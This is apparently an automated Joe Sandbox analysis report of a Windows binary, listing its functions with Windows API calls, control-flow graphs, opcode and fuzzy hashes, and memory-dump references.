                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50
                                                              Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 521 14000e4a8-14000e4b5 513->521 522 14000e4ee 513->522 516 14000e451-14000e45b 514->516 517 14000e425 514->517 516->516 518 14000e45d-14000e482 WriteFile 516->518 520 14000e430-14000e43a 517->520 520->520 523 14000e43c-14000e450 call 14000e620 520->523 524 14000e4c5-14000e4d6 WriteFile 521->524 525 14000e4b7-14000e4ba call 14000e620 521->525 522->510 528 14000e4dc-14000e4e8 HeapFree 524->528 530 14000e4bf-14000e4c3 525->530 528->522 530->528
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
                                                              Function 000000014000E770 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 531 14000e770-14000e7b7 WideCharToMultiByte 532 14000e7b9-14000e7d6 HeapAlloc 531->532 533 14000e81f-14000e822 531->533 534 14000e804 532->534 535 14000e7d8-14000e801 WideCharToMultiByte 532->535 536 14000e809-14000e81e 533->536 534->536 535->534
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704
                                                              Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 537 14000d914-14000d922 538 14000d924-14000d95a wcsncpy wcslen 537->538 539 14000d99e 537->539 540 14000d98a-14000d99c CreateDirectoryW 538->540 541 14000d95c-14000d96b 538->541 542 14000d9a0-14000d9a8 539->542 540->542 541->540 543 14000d96d-14000d97b 541->543 543->540 544 14000d97d-14000d988 543->544 544->540 544->541
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14
                                                              Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 545 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
                                                              Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00
                                                              Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40
                                                              Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID:
                                                              • API String ID: 1207063833-0
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22
                                                              Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                              Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348
                                                              Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 674 14000da6c-14000da80 676 14000da82-14000da85 674->676 677 14000da9f 674->677 679 14000da92-14000da9d DeleteFileW 676->679 680 14000da87-14000da8c SetFileAttributesW 676->680 678 14000daa1-14000daa6 677->678 679->678 680->679
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                              Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                              • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
                                                              Function 00000001400126D0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              • Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
                                                              • Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
                                                              Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                              • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                              Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                              • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                              Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
